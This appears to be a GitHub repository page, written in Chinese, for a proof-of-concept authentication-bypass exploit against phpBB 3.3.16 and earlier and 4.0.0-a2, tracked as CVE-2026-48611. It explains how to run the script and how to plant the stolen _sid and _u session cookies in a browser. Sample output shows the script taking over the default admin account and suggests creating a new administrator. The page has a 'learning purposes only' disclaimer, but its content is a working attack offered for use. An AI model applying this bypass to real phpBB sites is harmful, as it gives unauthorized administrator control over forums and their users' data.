wanmywan/CVE-2026-48611-phpBB
GitHub: wanmywan/CVE-2026-48611-phpBB
针对 phpBB 身份验证绕过漏洞(CVE-2026-48611)的概念验证脚本,可在受影响版本中获取会话并提权至管理员。
Stars: 0 | Forks: 0
# CVE-2026-48611-phpBB
绕过身份验证
简单的绕过身份验证 poc。如果你想通过浏览器访问,请不要忘记根据浏览器中显示的内容修改脚本中的 *USER_AGENT* 变量,这样才能生效。使用 cookie 编辑器替换 *_sid 和 *_u 的值
## 受影响版本:phpBB 3.3.16 及以下版本 + 4.0.0-a2
```
phpbb python3 exploit.py https://localhost:8000 joushk
[+] Target: https://localhost:8000
[+] Target username: joushk
[+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36
[+] Session cookies obtained:
phpbb3_cl7ge_u: 2
phpbb3_cl7ge_k:
phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3
[+] User ID: 2
[!] User ID is 2 – default admin account.
[!] EXPLOIT SUCCESSFUL!
[!] You now have admin access.
[!] Note: ACP may still ask for password if re-authentication is enabled.
[+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd
```
[!!!此脚本仅供学习目的]
标签:逆向工具